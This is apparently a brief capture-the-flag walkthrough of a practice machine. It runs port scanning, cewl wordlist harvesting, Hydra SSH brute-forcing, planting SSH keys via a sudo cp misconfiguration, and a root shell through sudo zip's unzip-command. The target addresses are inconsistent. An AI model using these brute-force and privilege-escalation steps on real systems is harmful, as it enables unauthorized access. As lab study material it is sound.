We start scanning the host with nmap -A -T4 -p- 192.168.1.10 –vv
The host page is full of writings in English and some other writings, lets try cewl to grab these writings
Copy the text to a file and clear the ones you don’t want because there are a lot of user names we only need as a username file to brute force the ssh service on the port 65345.
hydra -L users.txt -P users.txt ssh://220.127.116.11:65345
now lets login using the username pinak and the password Gandiv
When running sudo –l it gave us a message
In the root directory of the user sarang there is a ssh folder but when trying to copy it it gave us a permission denied, to we going to generate out ssh keys and then copy them as the user sarang and use ssh with sarang username to get access to their folder.
cat /home/pinak/.ssh/id_rsa.pub > /home/pinak/authorized_keys
sudo -u sarang /bin/cp /home/pinak/authorized_keys /home/sarang/.ssh/authorized_keys
ssh firstname.lastname@example.org -p 65345
sudo /usr/bin/zip test.zip test -T –unzip-command=”sh -c /bin/bash”